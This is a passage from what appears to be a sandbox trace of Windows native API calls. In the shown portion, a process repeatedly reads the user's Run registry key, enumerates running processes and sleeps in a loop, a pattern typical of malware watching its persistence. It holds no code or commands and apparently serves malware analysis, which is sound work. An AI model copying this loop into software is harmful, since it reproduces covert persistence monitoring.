KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.318] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.318] NtClose (Handle=0x154) returned 0x0 [0183.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.323] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.331] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.332] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.332] NtClose (Handle=0x154) returned 0x0 [0183.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.336] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.347] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.347] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.347] NtClose (Handle=0x154) returned 0x0 [0183.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.352] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.364] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.364] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.364] NtClose (Handle=0x154) returned 0x0 [0183.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.367] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.380] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.380] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.380] NtClose (Handle=0x154) returned 0x0 [0183.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.386] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.394] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.394] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.394] NtClose (Handle=0x154) returned 0x0 [0183.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.398] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.409] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.410] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.410] NtClose (Handle=0x154) returned 0x0 [0183.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.414] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.425] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.425] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.425] NtClose (Handle=0x154) returned 0x0 [0183.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.430] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.454] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.454] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.454] NtClose (Handle=0x154) returned 0x0 [0183.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.458] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.473] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.473] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.473] NtClose (Handle=0x154) returned 0x0 [0183.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.478] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.488] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.488] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.488] NtClose (Handle=0x154) returned 0x0 [0183.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.491] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.503] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.503] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.504] NtClose (Handle=0x154) returned 0x0 [0183.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.511] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.519] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.519] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.519] NtClose (Handle=0x154) returned 0x0 [0183.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.522] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.534] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.534] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.535] NtClose (Handle=0x154) returned 0x0 [0183.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, 